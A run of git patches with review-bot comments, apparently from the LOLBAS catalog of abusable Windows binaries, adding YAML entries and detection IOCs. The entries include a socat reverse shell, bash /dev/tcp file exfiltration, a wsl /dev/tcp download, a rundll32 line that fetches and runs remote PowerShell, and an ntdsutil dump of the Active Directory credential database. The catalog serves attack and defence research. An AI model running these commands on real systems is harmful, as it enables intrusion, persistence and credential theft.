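Review bot: `- Code:` under `Code_Sample:` sits at column 0 while the Ntdsutil.yml entry in the next patch writes it as `  - Code:`; both parse, but the inconsistent nesting makes the sample list easy to mis-edit, so indent it to match (the same column-0 `- Code:` is introduced into vbc.yml by patch 14). `OperatingSystem: Windows vista` should read `Windows Vista`. The file ends on `---` with no trailing newline (`\ No newline at end of file`), unlike the other new entries in this series; adding the newline keeps later diffs clean.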
@@ -0,0 +1,26 @@ +--- +Name: ntdsutil.exe +Description: Command line utility used to export Actove Directory. +Author: 'Tony Lambert' +Created: '2020-01-10' +Commands: + - Command: ntdsutil.exe “ac i ntds” “ifm” “create full c:\” q q + Description: Dump NTDS.dit into folder + Usecase: Dumping of Active Directory NTDS.dit database + Category: Dump + Privileges: Administrator + MitreID: T1003 + MitreLink: https://attack.mitre.org/wiki/Technique/T1003 + OperatingSystem: Windows +Full_Path: + - Path: C:\Windows\System32\ntdsutil.exe +Code_Sample: + - Code: +Detection: + - IOC: ntdsutil.exe with command line including "ifm" +Resources: + - Link: https://adsecurity.org/?p=2398#CreateIFM +Acknowledgement: + - Person: Sean Metcalf + Handle: '@PyroTek3' +--- From 94708ac5d6dc7457d807e41bd146f5ed7dafb813 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 23 Jan 2020 08:57:43 +0100 Subject: [PATCH 11/96] Added links to obfuscation technique from Sailay(valen) on rundll32 --- yml/OSBinaries/Rundll32.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index d452cb6..2d1ad59 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -73,6 +73,8 @@ Resources: - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ - Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/ + - Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md + - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md Acknowledgement: - Person: Casey Smith Handle: '@subtee' @@ -80,4 +82,6 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Jimmy Handle: '@bohops' + - Person: Sailay + Handle: '@404death' --- From acecdcf3dffcf3787bc8dd917c1f8d1dc55166b7 Mon Sep 17 00:00:00 2001 
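Review bot: The `Command` line uses typographic quotes (`“ac i ntds” “ifm” “create full c:\”`), which are not the straight `"` that cmd.exe and any detection rule keyed on this documented command line would see; replace them with ASCII double quotes so the IOC `ntdsutil.exe with command line including "ifm"` matches what the entry itself shows. `Description: Command line utility used to export Actove Directory.` has a typo (`Active`). `MitreLink` uses the legacy `wiki/Technique/T1003` form while GfxDownloadWrapper.yml in this series uses `https://attack.mitre.org/techniques/T1105/`; the `techniques/<ID>/` form is the current one. `OperatingSystem: Windows` is broader than where the tool exists — as far as I know ntdsutil.exe ships with the AD DS role / RSAT tooling rather than every client install, which is worth stating because it narrows where the IOC applies.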
From: Oddvar Moe Date: Thu, 23 Jan 2020 09:07:40 +0100 Subject: [PATCH 12/96] Netsh contribution from Freddie Bar-Smith - Thank you --- yml/OSBinaries/Netsh.yml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 yml/OSBinaries/Netsh.yml diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml new file mode 100644 index 0000000..63b0d40 --- /dev/null +++ b/yml/OSBinaries/Netsh.yml @@ -0,0 +1,35 @@ +--- +Name: Netsh.exe +Description: Netsh is a Windows tool used to manipulate network interface settings. +Author: 'Freddie Barr-Smith' +Created: '2019-12-24' +Commands: + - Command: netsh.exe add helper C:\Users\User\file.dll + Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called + Usecase: Proxy execution of .dll + Category: Execute + Privileges: User + MitreID: T1128 + MitreLink: https://attack.mitre.org/techniques/T1128/ + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\WINDOWS\System32\Netsh.exe + - Path: C:\WINDOWS\SysWOW64\Netsh.exe +Code_Sample: + - Code: +Detection: + - IOC: Netsh initiating a network connection +Resources: + - Link: https://freddiebarrsmith.com/trix/trix.html + - Link: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html + - Link: https://liberty-shell.com/sec/2018/07/28/netshlep/ +Acknowledgement: + - Person: 'Freddie Barr-Smith' + Handle: + - Person: 'Riccardo Spolaor' + Handle: + - Person: 'Mariano Graziano' + Handle: + - Person: 'Xabier Ugarte-Pedrero' + Handle: +--- \ No newline at end of file From c7c93e9f95f46e6b7dd180e909fd9d3eb5610dcb Mon Sep 17 00:00:00 2001 
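Review bot: `Detection: - IOC: Netsh initiating a network connection` does not correspond to the technique the entry documents (`netsh.exe add helper <dll>` registering a helper DLL); the observable is netsh.exe loading a DLL from a path outside `System32`/`SysWOW64`, and — as far as I recall — the helper list is persisted under `HKLM\SOFTWARE\Microsoft\NetSh`, so a registry-write IOC on that key is the direct detection of the persistence the Description mentions. Suggest `IOC: netsh.exe loading a DLL from a user-writable path, or a new value written under the Netsh helper registry key`. The four `Handle:` fields under `Acknowledgement` are left empty; either fill them or omit the key. The file also ends without a trailing newline (`\ No newline at end of file`).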
From: leo1-1 <61551576+leo1-1@users.noreply.github.com> Date: Thu, 27 Feb 2020 17:13:07 +0200 Subject: [PATCH 13/96] Create vbc.yml --- yml/OSBinaries/vbc.yml | 38 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 yml/OSBinaries/vbc.yml diff --git a/yml/OSBinaries/vbc.yml b/yml/OSBinaries/vbc.yml new file mode 100644 index 0000000..967520f --- /dev/null +++ b/yml/OSBinaries/vbc.yml @@ -0,0 +1,38 @@ +--- +Name: vbc.exe +Description: Binary file used for compile vbs code +Author: Lior Adar +Created: 27/02/2020 +Commands: + - Command: + vbc.exe /target:exe c:\temp\vbs\run.vb + Description: Binary file used by .NET to compile vb code to .exe + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges required:User + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + OperatingSystem: Windows 10,7 + - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb + Description: Description of the second command + Usecase: A description of the usecase + Category: Compile + Privileges required:User + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + +Full_Path: + - Path: +c:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe +C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe +Code_Sample: +Code: +1.vbc.exe /target:exe c:\temp\vbs\run.vb +2.vbc.exe -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb +Acknowledgement: + - Person: +Lior Adar +Hai Vaknin(Lux) + + +--- From 81c363ac8aa60d5159be5b7e8190b5f9be4ff1cb Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 16 Mar 2020 19:55:27 +0100 Subject: [PATCH 14/96] Adjustment to vbc.yml contribution --- yml/OSBinaries/vbc.yml | 29 ++++++++++++----------------- 1 file changed, 12 insertions(+), 17 deletions(-) diff --git a/yml/OSBinaries/vbc.yml b/yml/OSBinaries/vbc.yml index 967520f..52a479d 100644 --- a/yml/OSBinaries/vbc.yml +++ b/yml/OSBinaries/vbc.yml 
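Review bot: The second command still carries template text — `Description: Description of the second command` and `Usecase: A description of the usecase` — and the follow-up patch 14 leaves both in place as context; they need real values, e.g. a statement of what `-reference:Microsoft.VisualBasic.dll` changes relative to the first command. The entry has no `Detection:` section at all, unlike the other new binaries in this series, and patch 14 does not add one; a starting point is `IOC: vbc.exe compiling source from a user-writable location such as c:\temp`. `Description: Binary file used for compile vbs code` is misleading: the command's own `run.vb` argument shows it compiles Visual Basic .NET source, not VBScript — suggest `Description: Visual Basic .NET compiler shipped with the .NET Framework`. `Created: 27/02/2020` should use the ISO form (`'2020-02-27'`) the other entries use.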
@@ -4,12 +4,11 @@ Description: Binary file used for compile vbs code Author: Lior Adar Created: 27/02/2020 Commands: - - Command: - vbc.exe /target:exe c:\temp\vbs\run.vb + - Command: vbc.exe /target:exe c:\temp\vbs\run.vb Description: Binary file used by .NET to compile vb code to .exe Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile - Privileges required:User + Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ OperatingSystem: Windows 10,7 @@ -17,22 +16,18 @@ Commands: Description: Description of the second command Usecase: A description of the usecase Category: Compile - Privileges required:User + Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ - + OperatingSystem: Windows 10,7 Full_Path: - - Path: -c:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe Code_Sample: -Code: -1.vbc.exe /target:exe c:\temp\vbs\run.vb -2.vbc.exe -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb +- Code: Acknowledgement: - - Person: -Lior Adar -Hai Vaknin(Lux) - - ---- + - Person: Lior Adar + Handle: + - Person: Hai Vaknin(Lux) + Handle: +--- \ No newline at end of file From 4bef10b147b3af50175f205266ea69cb87623c41 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 16 Mar 2020 20:10:17 +0100 Subject: [PATCH 15/96] adjusted rasautou and removed ntdsutil --- yml/OtherMSBinaries/Ntdsutil.yml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 yml/OtherMSBinaries/Ntdsutil.yml diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml deleted file mode 100644 index 52d11df..0000000 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ /dev/null 
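Review bot: The corrected `Full_Path` lists only the `Framework64` copies of vbc.exe; I believe the 32-bit `C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe` also ships on 64-bit installs (the ilasm.yml entry later in this series uses that very directory), so a detection that keys on the listed paths would miss it — add it as a third `- Path:` entry if confirmed. The file still ends on `---` without a trailing newline (`\ No newline at end of file`).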
@@ -1,26 +0,0 @@
----
-Name: ntdsutil.exe
-Description: Command line utility used to export Actove Directory.
-Author: 'Tony Lambert'
-Created: '2020-01-10'
-Commands:
- - Command: ntdsutil.exe “ac i ntds” “ifm” “create full c:\” q q
- Description: Dump NTDS.dit into folder
- Usecase: Dumping of Active Directory NTDS.dit database
- Category: Dump
- Privileges: Administrator
- MitreID: T1003
- MitreLink: https://attack.mitre.org/wiki/Technique/T1003
- OperatingSystem: Windows
-Full_Path:
- - Path: C:\Windows\System32\ntdsutil.exe
-Code_Sample:
- - Code:
-Detection:
- - IOC: ntdsutil.exe with command line including "ifm"
-Resources:
- - Link: https://adsecurity.org/?p=2398#CreateIFM
-Acknowledgement:
- - Person: Sean Metcalf
- Handle: '@PyroTek3'
----
From 7a2ff4c25038bf26698538d1924ce6a9485a051d Mon Sep 17 00:00:00 2001
From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com>
Date: Tue, 17 Mar 2020 03:04:20 +0200
Subject: [PATCH 16/96] Create ilasm.yml
---
 yml/OSBinaries/ilasm.yml | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 yml/OSBinaries/ilasm.yml
diff --git a/yml/OSBinaries/ilasm.yml b/yml/OSBinaries/ilasm.yml
new file mode 100644
index 0000000..154c86c
--- /dev/null
+++ b/yml/OSBinaries/ilasm.yml
@@ -0,0 +1,37 @@
+---
+Name: ilasm.exe
+Description: used for compile c# code into dll or exe.
+Author: Hai vaknin (lux)
+Created: 17/03/2020
+Commands:
+ - Command:
+ ilasm.exe C:\public\test.txt /exe
+ Description: Binary file used by .NET to compile c# code to .exe
+ Usecase: Compile attacker code on system. Bypass defensive counter measures.
+ Category: Compile
+ Privileges required:User
+ MitreID: T1127
+ MitreLink: https://attack.mitre.org/techniques/T1127/
+ OperatingSystem: Windows 10,7
+ - Command: ilasm.exe C:\Users\חי\Desktop\test.txt /dll
+ Description: Binary file used by .NET to compile c# code to dll
+ Usecase: A description of the usecase
+ Category: Compile
+ Privileges required:User
+ MitreID: T1127
+ MitreLink: https://attack.mitre.org/techniques/T1127/
+
+Full_Path:
+ - Path:
+ C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
+ C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
+Code_Sample:
+Code:
+1.ilasm.exe C:\public\test.txt /exe
+2.ilasm.exe C:\Users\חי\Desktop\test.txt /dll
+Acknowledgement:
+ - Person:
+Hai Vaknin(Lux) https://github.com/LuxNoBulIshit
+Lior Adar
+
+---
From dc3a211c899c2c5fba5ad78337542901d11cdc5f Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Tue, 17 Mar 2020 10:55:59 +0100
Subject: [PATCH 17/96] Re-added ntdsutil
---
 yml/OtherMSBinaries/Ntdsutil.yml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 yml/OtherMSBinaries/Ntdsutil.yml
diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml
new file mode 100644
index 0000000..f9ae0f5
--- /dev/null
+++ b/yml/OtherMSBinaries/Ntdsutil.yml
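Review bot: `Description: used for compile c# code into dll or exe.` and both command Descriptions say ilasm compiles C#, but ilasm.exe is the IL assembler: it assembles CIL/MSIL text (the `.txt` in the sample commands is IL source) into an exe or dll, so the wording should say IL/MSIL rather than C#; the same text is kept in the adjusted file in PATCH 18/96. The second command's `Usecase: A description of the usecase` is the untouched template placeholder, and the file has no `Detection` section. A minimal one would be `- IOC: ilasm.exe invoked with a source file from a user-writable path`, with the caveat that what is unusual depends on whether the .NET SDK is in normal use on the host.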
@@ -0,0 +1,26 @@
+---
+Name: ntdsutil.exe
+Description: Command line utility used to export Actove Directory.
+Author: 'Tony Lambert'
+Created: '2020-01-10'
+Commands:
+ - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
+ Description: Dump NTDS.dit into folder
+ Usecase: Dumping of Active Directory NTDS.dit database
+ Category: Dump
+ Privileges: Administrator
+ MitreID: T1003
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1003
+ OperatingSystem: Windows
+Full_Path:
+ - Path: C:\Windows\System32\ntdsutil.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: ntdsutil.exe with command line including "ifm"
+Resources:
+ - Link: https://adsecurity.org/?p=2398#CreateIFM
+Acknowledgement:
+ - Person: Sean Metcalf
+ Handle: '@PyroTek3'
+---
\ No newline at end of file
From 94d10799d3b1b30e046d8512d0f0ffc46882725d Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Tue, 17 Mar 2020 11:05:14 +0100
Subject: [PATCH 18/96] Adjusted ilasm
---
 yml/OSBinaries/ilasm.yml | 31 ++++++++++++++-----------------
 1 file changed, 14 insertions(+), 17 deletions(-)
diff --git a/yml/OSBinaries/ilasm.yml b/yml/OSBinaries/ilasm.yml
index 154c86c..3cbd1b6 100644
--- a/yml/OSBinaries/ilasm.yml
+++ b/yml/OSBinaries/ilasm.yml
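Review bot: `Description: Command line utility used to export Actove Directory.` carries the typo "Actove" into the re-added file; the only other difference from the deleted version is the straight quotes in the Command. The Detection IOC keys on the literal `ifm` string, but ntdsutil accepts abbreviated sub-commands (the sample itself uses `ac i ntds`), so `- IOC: ntdsutil.exe with command line including "ifm" or "create full"` is more robust, and `create full` is the step that actually writes the database copy.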
@@ -1,37 +1,34 @@
 ---
-Name: ilasm.exe
+Name: Ilasm.exe
 Description: used for compile c# code into dll or exe.
 Author: Hai vaknin (lux)
 Created: 17/03/2020
 Commands:
- - Command:
- ilasm.exe C:\public\test.txt /exe
+ - Command: ilasm.exe C:\public\test.txt /exe
 Description: Binary file used by .NET to compile c# code to .exe
 Usecase: Compile attacker code on system. Bypass defensive counter measures.
 Category: Compile
- Privileges required:User
+ Privileges: User
 MitreID: T1127
 MitreLink: https://attack.mitre.org/techniques/T1127/
 OperatingSystem: Windows 10,7
- - Command: ilasm.exe C:\Users\חי\Desktop\test.txt /dll
+ - Command: ilasm.exe C:\public\test.txt /dll
 Description: Binary file used by .NET to compile c# code to dll
 Usecase: A description of the usecase
 Category: Compile
- Privileges required:User
+ Privileges: User
 MitreID: T1127
 MitreLink: https://attack.mitre.org/techniques/T1127/
-
 Full_Path:
- - Path:
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
+ - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
+ - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
 Code_Sample:
-Code:
-1.ilasm.exe C:\public\test.txt /exe
-2.ilasm.exe C:\Users\חי\Desktop\test.txt /dll
+- Code:
+Resources:
+ - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
 Acknowledgement:
- - Person:
-Hai Vaknin(Lux) https://github.com/LuxNoBulIshit
-Lior Adar
-
+ - Person: Hai Vaknin(Lux)
+ Handle: '@VakninHai'
+ - Person: Lior Adar
+ Handle:
 ---
From cce7c5ce3a6daab089b3b13f8af8e6126ace99f3 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Tue, 17 Mar 2020 11:08:47 +0100
Subject: [PATCH 19/96] Adjusted error in atbroker as per issue #47
---
 yml/OSBinaries/Atbroker.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml
index 0d58b23..013ea5b 100644
--- a/yml/OSBinaries/Atbroker.yml
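Review bot: After the blank line is removed, the second command entry still ends at `MitreLink:` with no `OperatingSystem:` line, while the first entry and the matching vbc.yml adjustment in PATCH 14/96 both carry `OperatingSystem: Windows 10,7`; add `    OperatingSystem: Windows 10,7` so the entries are parallel. `Handle:` for Lior Adar is left without a value, which loads as null; the form used elsewhere in the catalog is an explicit empty string, `Handle: ''`.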
+++ b/yml/OSBinaries/Atbroker.yml
@@ -19,7 +19,7 @@ Code_Sample:
 - Code:
 Detection:
 - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
+ - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
 - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
 Resources:
 - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
From e4face79af14a433f373724c0af5c02cb65ec880 Mon Sep 17 00:00:00 2001
From: Martin Ingesen
Date: Wed, 18 Mar 2020 15:20:50 +0100
Subject: [PATCH 20/96] Using rundll32 to execute dll via SMB
---
 yml/OSBinaries/Rundll32.yml | 8 ++++++++
 1 file changed, 8 insertions(+)
diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml
index 2d1ad59..d7f9f60 100644
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@@ -12,6 +12,14 @@ Commands:
 MitreID: T1085
 MitreLink: https://attack.mitre.org/wiki/Technique/T1085
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
+ Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
+ Usecase: Execute DLL from SMB share.
+ Category: Execute
+ Privileges: User
+ MitreID: T1085
+ MitreLink: https://attack.mitre.org/techniques/T1085
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
 Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
 Usecase: Execute code from Internet
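Review bot: The new entry's `MitreLink: https://attack.mitre.org/techniques/T1085` uses a different URL form from the `https://attack.mitre.org/wiki/Technique/T1085` of the sibling entry directly above it; the file should settle on one. The Detection section, which lies outside this hunk, has nothing for this variant; the stable signal is the UNC path on the command line, e.g. `- IOC: rundll32.exe loading a DLL from a UNC path (\\host\share\...)`.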
From d67c8f5c11b84ca971a4499420dae8883eccfdc2 Mon Sep 17 00:00:00 2001
From: "Chris \"Lopi\" Spehn"
Date: Fri, 20 Mar 2020 11:51:21 -0600
Subject: [PATCH 21/96] Update RegAsm to the correct permissions
---
 yml/OSBinaries/Regasm.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml
index 1569be0..1729e21 100644
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@@ -8,12 +8,12 @@ Commands:
 Description: Loads the target .DLL file and executes the RegisterClass function.
 Usecase: Execute code and bypass Application whitelisting
 Category: AWL bypass
- Privileges: User
+ Privileges: Local Admin
 MitreID: T1121
 MitreLink: https://attack.mitre.org/wiki/Technique/T1121
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- - Command: regasm.exe AllTheThingsx64.dll
- Description: Loads the target .DLL file and executes the RegisterClass function.
+ - Command: regasm.exe /U AllTheThingsx64.dll
+ Description: Loads the target .DLL file and executes the UnRegisterClass function.
 Usecase: Execute code and bypass Application whitelisting
 Category: Execute
 Privileges: User
@@ -36,4 +36,4 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
\ No newline at end of file
+---
From f2fa2ef9890257b088909ffb4caff6b37f8a9453 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Wed, 25 Mar 2020 10:26:59 +0100
Subject: [PATCH 22/96] Added additional example to wsl.exe
---
 yml/OtherMSBinaries/Wsl.yml | 10 ++++++++++
 1 file changed, 10 insertions(+)
diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml
index 0922afc..257ec57 100644
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
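Review bot: `Privileges: Local Admin` introduces a value not used anywhere else in this series: the other entries that need elevation say `Privileges: Administrator` (Ntdsutil.yml, Sqldumper.yml, Ttdinject.yml), and anything that groups or filters entries by privilege level will treat the new spelling as a separate category. Suggest `    Privileges: Administrator`.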
@@ -20,6 +20,14 @@ Commands:
 MitreID: T1202
 MitreLink: https://attack.mitre.org/techniques/T1202
 OperatingSystem: Windows 10, Windows 19 Server
+ - Command: wsl.exe --exec bash -c 'cat file'
+ Description: Cats /etc/shadow file as root
+ Usecase: Performs execution of arbitrary Linux commands.
+ Category: Execute
+ Privileges: User
+ MitreID: T1202
+ MitreLink: https://attack.mitre.org/techniques/T1202
+ OperatingSystem: Windows 10, Windows 19 Server
 Full_Path:
 - Path: C:\Windows\System32\wsl.exe
 Code_Sample:
@@ -33,4 +41,6 @@ Acknowledgement:
 Handle: '@aionescu'
 - Person: Matt
 Handle: '@NotoriousRebel1'
+ - Person: Asif Matadar
+ Handle: '@d1r4c'
 ---
From 6ac04d73d717835ba896054d4f031a51d861c53a Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Wed, 25 Mar 2020 11:08:13 +0100
Subject: [PATCH 23/96] Added examples to bash.exe
---
 yml/OSBinaries/Bash.yml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml
index 64d96bf..f8aaaa7 100644
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
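Review bot: The command `wsl.exe --exec bash -c 'cat file'` and its `Description: Cats /etc/shadow file as root` describe different things: the command reads a generic `file`, and nothing in it elevates unless the distro's default user happens to be root, so either the Description should match (`Description: Reads a file through the WSL bash shell`) or the command should show what the description claims. `Category: Execute` is a stretch for a file read; the catalog's `Reconnaissance` category (see Psr.yml) fits the stated intent better. `OperatingSystem: Windows 10, Windows 19 Server` is copied from the entry above, and again in the PATCH 25/96 download example; it presumably means `Windows Server 2019`.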
@@ -12,6 +12,22 @@ Commands:
 MitreID: T1218
 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
 OperatingSystem: Windows 10
+ - Command: bash.exe -c "socat tcp-connect:192.168.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
+ Description: Executes a reverseshell
+ Usecase: Performs execution of specified file, can be used as a defensive evasion.
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 10
+ - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
+ Description: Exfiltrate data
+ Usecase: Performs execution of specified file, can be used as a defensive evasion.
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 10
 - Command: bash.exe -c calc.exe
 Description: Executes calc.exe from bash.exe
 Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@@ -32,4 +48,6 @@ Resources:
 Acknowledgement:
 - Person: Alex Ionescu
 Handle: '@aionescu'
+ - Person: Asif Matadar
+ Handle: '@d1r4c'
 ---
\ No newline at end of file
From 9f110bce0755c71af1508d947ef5788729330210 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Wed, 25 Mar 2020 11:24:54 +0100
Subject: [PATCH 24/96] Fixed missing octet in command
---
 yml/OSBinaries/Bash.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml
index f8aaaa7..4b34149 100644
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
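Review bot: Both new entries reuse the calc.exe example's `Usecase: Performs execution of specified file, can be used as a defensive evasion.`, which describes neither a reverse shell nor an exfiltration; `Usecase: Reverse shell from WSL` and `Usecase: Exfiltrate a file over a raw TCP connection` would match their Descriptions. The exfiltration entry is categorised `Execute` although the catalog has an `Upload` category for sending data out. The socat example also depends on socat being installed in the distro, which is typically not the case by default and is worth stating in the Description, since a defender judging exposure will otherwise assume it is always available.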
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218
 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
 OperatingSystem: Windows 10
- - Command: bash.exe -c "socat tcp-connect:192.168.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
+ - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
 Description: Executes a reverseshell
 Usecase: Performs execution of specified file, can be used as a defensive evasion.
 Category: Execute
From 9722cceb9ef18b126147259e6dfa215faa7fa36f Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Wed, 25 Mar 2020 11:33:02 +0100
Subject: [PATCH 25/96] Added download example to wsl.exe
---
 yml/OtherMSBinaries/Wsl.yml | 8 ++++++++
 1 file changed, 8 insertions(+)
diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml
index 257ec57..06b6384 100644
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -28,6 +28,14 @@ Commands:
 MitreID: T1202
 MitreLink: https://attack.mitre.org/techniques/T1202
 OperatingSystem: Windows 10, Windows 19 Server
+ - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
+ Description: Downloads file from 192.168.1.10
+ Usecase: Download file
+ Category: Download
+ Privileges: User
+ MitreID: T1202
+ MitreLink: https://attack.mitre.org/techniques/T1202
+ OperatingSystem: Windows 10, Windows 19 Server
 Full_Path:
 - Path: C:\Windows\System32\wsl.exe
 Code_Sample:
From aef4b069524967f57525a0e45bb949af00d1f587 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Tue, 21 Apr 2020 23:52:22 +0200
Subject: [PATCH 26/96] Download for ftp.exe add a non-interactive one-line command to download arbitrary binary with ftp.exe excessively useful on Windows XP, & Windows Server 2003 where all other LOLBAS that allow download (certutils, bitsutils, etc.) don't exist and where powershell was not install by default.
---
 yml/OSBinaries/Ftp.yml | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)
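Review bot: `Description: Downloads file from 192.168.1.10` leaves out what makes the example work: `--exec bash` guarantees bash's `/dev/tcp` redirection is available, and a listener must already be serving the file on port 54; `Description: Downloads a file from a TCP listener at 192.168.1.10:54 using bash's /dev/tcp redirection` says so. The Detection section, outside this hunk, could key on `/dev/tcp` in a wsl.exe or bash.exe command line, which is the same signal the Bash.yml exfiltration example in PATCH 23/96 needs.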
diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml
index 8b2d23c..3476a96 100644
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@@ -12,6 +12,14 @@ Commands:
 MitreID: T1218
